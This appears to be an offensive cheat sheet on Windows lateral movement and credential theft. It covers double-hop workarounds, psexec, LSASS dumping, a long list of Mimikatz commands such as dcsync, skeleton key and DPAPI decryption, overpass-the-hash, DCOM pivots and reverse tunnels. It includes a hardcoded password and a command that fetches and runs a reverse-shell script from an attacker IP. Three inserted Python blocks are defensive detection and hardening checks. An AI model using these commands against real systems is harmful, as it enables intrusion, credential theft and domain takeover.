If you obtain the shell through pass the hash or pass the ticket, you perform a network login, which means you run into the Kerberos double-hop issue.
The way around it is to perform an interactive login, but that requires the clear-text credentials.
PSRemoting uses pass the ticket. This is how Kerberos is meant to work and is a limitation by design; it is the entire reason Kerberos delegation was invented.
Often the simplest way is to migrate into or inject into a SYSTEM process and perform actions from there, since that runs in the context of the computer account, which performed an interactive login at startup.
$username = 'devmanager'
$password = 'F0rRunning$cheduledTasks!'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Invoke-Command -ComputerName CASC-DC1.CASCADE.LOCAL -Credential $credential -scriptblock {powershell.exe -c "IEX(iwr http://10.10.14.22/Invoke-PowerShellTcp.ps1 -UseBasicParsing)" }
#Invoke hostname on 3rd server
$cred = Get-Credential Contoso\Administrator
Invoke-Command -ComputerName ServerB -Credential $cred -ScriptBlock {
Invoke-Command -ComputerName ServerC -Credential $Using:cred -ScriptBlock {hostname}
}
#Port forwarding from host to Target's WinRM
netsh interface portproxy add v4tov4 listenport=5446 listenaddress=10.35.8.17 connectport=5985 connectaddress=10.35.8.23
netsh advfirewall firewall add rule name=fwd dir=in action=allow protocol=TCP localport=5446
Enter-PSSession Session1 -Credential domain\user
#Ref:https://posts.slayerlabs.com/double-hop/
#Creates a new session configuration on the remote computer
#when connected, forces it to always run with the credential provided.
Invoke-Command -ComputerName <Hop1PC> -ScriptBlock { Register-PSSessionConfiguration -Name Creds -RunAsCredential <domain-name>\<domainaccount> -Force }
Invoke-Command -ComputerName <Hop1PC> -ConfigurationName Creds -ScriptBlock {\\<Kali-IP>\revshell.exe 10.10.x.x 4445}
#Run a process as a different user
$secpasswd = ConvertTo-SecureString "<pass>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<domain\username>", $secpasswd)
$computer = "<COMPUTER_NAME>"
#$Using: is only valid inside a remote script block; locally the variable is referenced directly
Start-Process powershell.exe -Credential $mycreds -NoNewWindow
#Troubleshoot
$s = New-PSSession -Credential $mycreds
Invoke-Command -Session $s -Scriptblock {whoami}
#Enable RDP on target
#1.Add yourself to the remote desktop users group
#2. Enable on target using Powershell
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
#3. Execute from a shell, not from a PSRemoting session.
#If you run the following commands from a remote PowerShell session you will be disconnected, because the RDP listener is moved to port 5985 (the WinRM port),
#so WinRM has to be stopped with sc.exe before the Remote Desktop service can take the port.
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" -Name PortNumber -Value 5985
sc.exe stop WinRM
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
#Runas
runas /netonly /user:garrison.local\Administrator powershell.exe
psexec
Requires a CIFS ticket for the target.
The service it creates requires manual deletion with sc.
#psexec. Drops into NT Authority/SYSTEM
psexec.py BLACKFIELD.local/<user>@<IP> -hashes ":<NT hash>"
#Execute local executable on remote system
psexec.exe \\REMOTECOMPUTER -i -c <localfile.exe> /accepteula
#Execute as SYSTEM
psexec -s cmd
#enable PSRemote remotely
$computerName = 'REMOTECOMPUTER'
psexec "\\$computerName" -s c:\windows\system32\winrm.cmd quickconfig -quiet 2>&1 > $null
#OR
PowerShell Remoting
Enabled by default on Server 2012 onwards. Used by administrators.
Uses WinRM over HTTP on TCP 5985 (the traffic is still encrypted) or HTTPS on TCP 5986.
Requires admin privileges on the target machine.
Tip: This can be an enumeration technique.
May need to enable remoting (Enable-PSRemoting) on a desktop Windows machine; admin privileges are required to do that.
The LSA, which includes the Local Security Authority Server Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. LSA Protection prevents non-protected processes from interacting with LSASS. Mimikatz can still bypass this with a driver
Run PowerShell as Administrator.
Using the code from ReflectivePEInjection, Mimikatz is loaded reflectively into memory; all Mimikatz functions can be used from this script.
#Ways to dump credentials from memory
--
-Dumping LSASS from Task Manager
get-process lsass
tasklist | findstr lsass
procdump.exe -accepteula -ma "lsass.exe" out.dmp
procdump.exe -accepteula -ma 580 out.dmp
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump [PID] C:\temp\out.dmp full
crackmapexec smb 192.168.0.76 -u testadmin -p Password123 --lsa
#From Windows
sekurlsa::minidump c:\lsass.dmp
log lsass.txt
sekurlsa::logonPasswords
#From Linux
pypykatz lsa minidump lsass.DMP
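The dump methods above all leave a process-creation record behind. The following is an added detection example, not code from the original notes: it runs a few constructed Windows 4688-style records (fields Image and CommandLine) through rules that match procdump aimed at lsass by name or by PID, and rundll32 calling the MiniDump export of comsvcs.dll. The lsass PID is passed in because procdump can be pointed at the PID and would otherwise slip past a name-only rule. Event records and PID values are constructed for the example.

```python
"""Detection rules for LSASS memory dumping via process command lines (added example)."""
import re

# Rules applied to the full command line (case-insensitive).
RULES = [
    # procdump -ma pointed at lsass by process name, optionally quoted
    ("procdump-lsass-name",
     re.compile(r'procdump(?:64)?(?:\.exe)?\b.*\s-ma\s+"?lsass(?:\.exe)?"?', re.I)),
    # rundll32 loading comsvcs.dll and invoking its MiniDump export
    ("comsvcs-minidump",
     re.compile(r"rundll32(?:\.exe)?\b.*comsvcs\.dll\s*,\s*minidump", re.I)),
]

# procdump -ma <pid>: only a hit when <pid> is the live lsass PID
PROCDUMP_PID = re.compile(r"procdump(?:64)?(?:\.exe)?\b.*\s-ma\s+(\d+)\b", re.I)

# Constructed 4688-style records; the lsass PID 580 matches the notes above.
SAMPLE_EVENTS = [
    {"EventID": 4688, "Image": r"C:\Tools\procdump.exe",
     "CommandLine": r'procdump.exe -accepteula -ma "lsass.exe" out.dmp'},
    {"EventID": 4688, "Image": r"C:\Tools\procdump.exe",
     "CommandLine": r"procdump.exe -accepteula -ma 580 out.dmp"},
    {"EventID": 4688, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 580 C:\temp\out.dmp full"},
    {"EventID": 4688, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c tasklist | findstr lsass"},      # recon only, not flagged
    {"EventID": 4688, "Image": r"C:\Tools\procdump.exe",
     "CommandLine": r"procdump.exe -accepteula -ma 1234 w3wp.dmp"},  # dump of another process
]


def detect_lsass_dump(events, lsass_pid):
    """Return [(rule_name, command_line)] for every process-creation event that matches."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4688:
            continue
        cmd = ev.get("CommandLine", "")
        for name, rx in RULES:
            if rx.search(cmd):
                findings.append((name, cmd))
                break
        else:
            # No name-based rule hit: check for procdump against the lsass PID
            m = PROCDUMP_PID.search(cmd)
            if m and int(m.group(1)) == lsass_pid:
                findings.append(("procdump-lsass-pid", cmd))
    return findings


if __name__ == "__main__":
    for rule, cmd in detect_lsass_dump(SAMPLE_EVENTS, lsass_pid=580):
        print(f"[{rule}] {cmd}")
```

Command-line rules cover the local techniques listed; a remote dump such as the crackmapexec `--lsa` line above shows up instead as a network logon (4624 type 3) followed by remote registry and service activity, and a Sysmon ProcessAccess (event 10) rule on lsass.exe catches both the named and the PID-based variants without depending on the tool's spelling.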
--
#Enable WDigest to store clear-text credentials
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
sekurlsa::wdigest
sekurlsa::logonpasswords
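The registry change above and the LSA Protection setting mentioned earlier are both single DWORDs, so a host can be checked for them from the text that `reg query` prints. The following is an added hardening check, not code from the original notes: the `reg query` output format is real, but the two samples (the weak state the `reg add` above produces, and the corrected state) are constructed, and treating an absent value as the default is an assumption stated in the comments.

```python
"""Audit WDigest clear-text caching and LSA Protection from `reg query` output (added example)."""
import re

WDIGEST_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
LSA_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"

# Constructed: what `reg query` shows after UseLogonCredential has been set to 1
WEAK_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    Negotiate    REG_DWORD    0x0
    UseLogonCredential    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    RunAsPPL    REG_DWORD    0x0
"""

# Constructed: the hardened state (no clear-text caching, LSASS runs as a protected process)
HARDENED_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    Negotiate    REG_DWORD    0x0
    UseLogonCredential    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    RunAsPPL    REG_DWORD    0x1
"""

# A value line: indentation, name, REG_* type, data
VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s+(.*)$")


def parse_reg_query(text):
    """Return {key_path: {value_name: (reg_type, data)}} parsed from `reg query` output."""
    keys = {}
    current = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("HKEY_"):
            current = line.strip()
            keys[current] = {}
            continue
        m = VALUE_LINE.match(line)
        if m and current is not None:
            keys[current][m.group(1)] = (m.group(2), m.group(3).strip())
    return keys


def dword(values, name, default=None):
    """Read a REG_DWORD as int; `reg query` prints it as 0x<hex>."""
    entry = values.get(name)
    if entry is None:
        return default
    return int(entry[1], 0)


def audit_lsa_hardening(reg_query_output):
    """Return a list of findings; an empty list means both settings are in the hardened state."""
    keys = parse_reg_query(reg_query_output)
    wdigest = keys.get(WDIGEST_KEY, {})
    lsa = keys.get(LSA_KEY, {})
    findings = []
    # Assumption: a missing UseLogonCredential behaves as 0 (Windows 8.1 / 2012 R2 and
    # later, or older systems with KB2871997), so only an explicit 1 is a finding.
    if dword(wdigest, "UseLogonCredential", 0) == 1:
        findings.append("WDigest UseLogonCredential=1: clear-text passwords are kept in LSASS; set it to 0")
    # Assumption: a missing RunAsPPL means LSA Protection was never configured, i.e. off.
    if dword(lsa, "RunAsPPL", 0) == 0:
        findings.append("LSA Protection off (RunAsPPL missing or 0): unprotected processes can open LSASS; set RunAsPPL=1")
    return findings


if __name__ == "__main__":
    for state, sample in (("weak", WEAK_REG_QUERY), ("hardened", HARDENED_REG_QUERY)):
        print(state, audit_lsa_hardening(sample) or ["OK"])
```

To use it on a real host, run `reg query` for each of the two keys, concatenate the output and pass it to `audit_lsa_hardening()`. A non-zero RunAsPPL is treated as enabled because newer builds also accept values other than 1 for the UEFI-locked variant; the page's own note that Mimikatz can still get past LSA Protection with a driver is the reason this check is a baseline, not a guarantee.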
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
kerberos::ptt <file>.kirbi
misc::skeleton
lsadump::lsa /inject
token::elevate
lsadump::sam
lsadump::secrets
lsadump::trust /patch
lsadump::lsa /patch
lsadump::dcsync /user:dcorp\krbtgt
#Cached logons. Can't perform "pass-the-hash" style attacks with this type of hash.
"token::elevate" "lsadump::cache"
hashcat -m2100 '$DCC2$10240#<NAME>#<HASH>' /usr/share/wordlists/rockyou.txt --force --potfile-disable
#Restore NT hash of a user
lsadump::setntlm /user:<user> /ntlm:<hash>
#Export private certificates
Invoke-Mimikatz -DumpCerts
#SSP Attack: Store passwords of all logins in clear-text to c:\Windows\System32\mimilsa.log
"privilege::debug" "misc::memssp"
-----
#Credential Manager
#Extract credentials from Credential Vault from "\AppData\Local\Microsoft\Vault"
"vault::list"
#Extract credentials from Credential Vault from "\AppData\Local\Microsoft\Credentials"
"vault::cred"
#List plain-text creds [Risky]
"vault::cred" /patch
-----
#DPAPI Abuse
dir /a c:\Users\<username>\appdata\local\microsoft\credentials\<Credential file>\
#Copy Master Key
dpapi::cred /in:c:\Users\<username>\appdata\local\microsoft\credentials\<Credential file>\
#Grab GUID Master Key value
dir /a c:\Users\<username>\appdata\roaming\microsoft\protect\<GUID Master key value>
#Grab Master Key to Decrypt
dpapi::masterkey /in:c:\Users\<username>\appdata\roaming\microsoft\protect\<GUID Master key value> /rpc
#Decrypt
dpapi::cred /in:c:\Users\<username>\appdata\local\microsoft\credentials\<Credential file> /masterkey:<Key value from above command>
--
#Dump Domain-wide DPAPI Backup Key from DC
lsadump::backupkeys /system:<DC> /export
#Decrypt target user's master key using DPAPI Backup key
dpapi::masterkey /in:"<User-master-key>" /pvk:"Domain-backup-key"
#Decrypt cookie values with target user's master key
dpapi::chrome /masterkey:<user-master-key> /in:<Path-to-chrome-cookies>
--
#Crack masterkey with user's clear-text pass
dpapi::masterkey /in:<Users-key> /sid:<User-SID> /password:<password> /protected
#Without knowing the password, but with code exec, extract domain key from DC
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<SID>\<Master-key-GUID>" /rpc
#Decrypt credentials from Windows Vault using master key
dpapi::cred /in:<creds> /masterkey:<masterkey> /unprotect
Over Pass The Hash
Obtain Kerberos tickets from NTLM hash.
An attacker can leverage the NTLM hash of another user account to obtain a Kerberos ticket which can be used to access network resources. This can come in handy if you are only able to obtain the NTLM hash for an account, but require Kerberos authentication to reach your destination.
Likely to cause an alert since the encryption method of the EncryptedTimestamp field in AS_REQ is being downgraded.
To make this attack stealthier, use NTLM + AES keys [aes256_hmac + aes128_hmac]
aes128 keys can be specified even if they do not actually exist.
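The alert mentioned above comes from the domain controller's 4768 (TGT request) event, where the ticket encryption type drops to RC4 (0x17) for an account that normally receives AES (0x12) tickets. The following is an added detection example, not code from the original notes: the 4768 field names are real, but the records, the account names and the per-account baseline are constructed. Because supplying the AES keys, as the note above says, removes the encryption-type signal, the rule also compares the requesting host against the account's baseline.

```python
"""Flag TGT requests that downgrade encryption or come from an unusual host (added example)."""

ETYPE_NAMES = {
    "0x1": "des-cbc-crc", "0x3": "des-cbc-md5",
    "0x11": "aes128-cts-hmac-sha1-96", "0x12": "aes256-cts-hmac-sha1-96",
    "0x17": "rc4-hmac", "0x18": "rc4-hmac-exp",
}
WEAK_ETYPES = {"0x1", "0x3", "0x17", "0x18"}
AES_ETYPES = {"0x11", "0x12"}

# Constructed baseline built from earlier successful 4768s: usual etypes and source hosts per account.
BASELINE = {
    "alice.admin": {"etypes": {"0x12"}, "hosts": {"::ffff:10.10.10.21"}},
    "svc_legacy": {"etypes": {"0x17"}, "hosts": {"::ffff:10.10.10.40"}},
}

# Constructed 4768 records. Successful TGT requests carry Status 0x0.
SAMPLE_4768 = [
    {"EventID": 4768, "TargetUserName": "alice.admin", "IpAddress": "::ffff:10.10.10.21",
     "TicketEncryptionType": "0x12", "Status": "0x0"},   # normal
    {"EventID": 4768, "TargetUserName": "alice.admin", "IpAddress": "::ffff:10.10.10.99",
     "TicketEncryptionType": "0x17", "Status": "0x0"},   # RC4 from a new host: the downgrade pattern
    {"EventID": 4768, "TargetUserName": "svc_legacy", "IpAddress": "::ffff:10.10.10.40",
     "TicketEncryptionType": "0x17", "Status": "0x0"},   # RC4, but that is this account's norm
    {"EventID": 4768, "TargetUserName": "alice.admin", "IpAddress": "::ffff:10.10.10.99",
     "TicketEncryptionType": "0x12", "Status": "0x0"},   # AES keys supplied: only the host stands out
    {"EventID": 4768, "TargetUserName": "alice.admin", "IpAddress": "::ffff:10.10.10.99",
     "TicketEncryptionType": "0x17", "Status": "0x6"},   # failed request (unknown principal), skipped
]


def detect_tgt_anomalies(events, baseline):
    """Return [(account, source_ip, [reasons])] for successful TGT requests that deviate from baseline."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4768 or ev.get("Status") != "0x0":
            continue
        acct = ev["TargetUserName"].lower()
        etype = ev["TicketEncryptionType"].lower()
        base = baseline.get(acct, {"etypes": set(), "hosts": set()})
        reasons = []
        if etype in WEAK_ETYPES:
            if base["etypes"] and base["etypes"] <= AES_ETYPES:
                # The account has only ever used AES; a weak etype now is a downgrade.
                reasons.append(f"encryption downgrade to {ETYPE_NAMES.get(etype, etype)} for an AES-only account")
            elif not base["etypes"]:
                reasons.append(f"weak encryption type {ETYPE_NAMES.get(etype, etype)} with no baseline")
        if base["hosts"] and ev["IpAddress"] not in base["hosts"]:
            reasons.append(f"TGT requested from unusual host {ev['IpAddress']}")
        if reasons:
            findings.append((acct, ev["IpAddress"], reasons))
    return findings


if __name__ == "__main__":
    for acct, src, reasons in detect_tgt_anomalies(SAMPLE_4768, BASELINE):
        print(acct, src, "; ".join(reasons))
```

The baseline is what makes the rule usable: a domain with legacy members issues RC4 tickets every day, so RC4 alone is noise, whereas RC4 for an account that has only ever used AES, from a host it has never used, is the combination worth paging on.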
DCOM is performed over RPC on TCP port 135 and local administrator access is required to call the DCOM Service Control Manager, which is essentially an API.
Requires local admin privileges on the target.
Requires the presence of Microsoft Office on the target computer.
#Outlook
Reference: https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/
$com = [Type]::GetTypeFromProgID('Outlook.Application','192.168.99.152')
$object = [System.Activator]::CreateInstance($com)
$RemoteScriptControl = $object.CreateObject("ScriptControl")
#Compile the "payload" in C# and pass it to DotNetToJScript. Save the output to $code
$RemoteScriptControl.Language = "JScript"
$RemoteScriptControl.AddCode($code)
#Excel: Create a macro-enabled excel docm
Reference: https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application","<Remote-IP>"))
$LocalPath = "C:\Users\jeff_admin.corp\myexcel.xls"
$RemotePath = "\\192.168.1.110\c$\myexcel.xls"
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)
$Path = "\\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop"
$temp = [system.io.directory]::createDirectory($Path)
$Workbook = $com.Workbooks.Open("C:\myexcel.xls")
$com.Run("mymacro")
PSScript: https://gist.github.com/enigma0x3/8d0cabdb8d49084cdcf03ad89454798b
Invoke-ExcelMacroPivot -Target "192.168.99.152" -RemoteDocumentPath "C:\Book1.xlsm" -MacroName "Auto_Open"
#PowerPoint: Create a PowerPoint add-in from this content, you must save as either a PPA / PPAM file
Reference: https://attactics.org/2018/02/dcom-lateral-movement-powerpoint/
PSScript: https://github.com/attactics/Invoke-DCOMPowerPointPivot/blob/master/Invoke-DCOMPowerPointPivot.ps1
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("PowerPoint.Application", "10.10.10.10"))
$addin = $com.AddIns.Add("c:\testfile.ppam")
Once a port forward is set up to the attacker's host, gssapi-proxy lets the victim's active Kerberos tickets be used to access intranet sites.
#May need to bypass UAC initially
https://github.com/mikkolehtisalo/gssapi-proxy
Firewall Rules Modification
netsh advfirewall firewall add rule name="NAME" dir=in action=allow protocol=tcp localport=PORT
#Metasploit
use multi/manage/autoroute
#Reverse port forward.
run portfwd -R -p <Remote pivot port> -l <Local port to listen on> -L <Local Host IP to listen on>
#Set up SOCKS proxy [/etc/proxychains.conf]
use auxiliary/server/socks4a
to same as -l
Establish reverse connection to Attacker's SSH server to create an SSH tunnel.
gedit /etc/ssh/sshd_config
Plink.exe is a Windows command line version of the PuTTY SSH client. Now that Windows comes with its own inbuilt SSH client, plink is less useful for modern servers.
Transfer binary to the target
Use it to create a reverse connection.
cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N
OpenSSH keys will not work here as-is. Convert id_rsa to KEY.ppk.
The resulting .ppk file can then be transferred to the Windows target and used exactly as in the reverse port forwarding taught in the previous task (although the private key has been converted, it still works with the same public key added to the authorized_keys file).